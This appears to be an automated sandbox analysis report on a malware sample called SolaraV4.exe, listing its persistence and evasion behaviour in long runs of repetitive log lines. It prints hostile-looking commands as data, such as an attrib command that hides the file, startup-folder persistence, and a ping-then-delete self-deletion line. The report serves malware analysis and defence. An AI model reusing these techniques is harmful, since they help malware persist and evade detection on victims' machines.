Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior
barindex
Found pyInstaller with non standard icon
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: "C:\Users\user\Desktop\SolaraV4.exe"
Uses attrib.exe to hide files
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV4.exe"
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: attrib.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Drops PE files
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\libffi-7.dll Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\_sqlite3.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\libcrypto-1_1.dll Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\python310.dll Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\_queue.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\_lzma.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\_socket.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\_decimal.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\VCRUNTIME140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.dll Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\select.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\_ssl.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\sqlite3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\libssl-1_1.dll Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\_bz2.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\Users\user\AppData\Local\Temp\_MEI71122\_hashlib.pyd Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\Desktop\SolaraV4.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Self deletion via cmd or bat file
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\SolaraV4.exe""
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\SolaraV4.exe"" Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC55830 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError, 1_2_00007FF6FFC55830
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
